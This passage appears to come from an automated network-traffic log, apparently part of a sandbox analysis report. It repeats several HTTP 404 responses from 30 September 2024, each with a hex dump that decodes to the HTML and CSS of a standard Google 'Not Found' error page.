64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 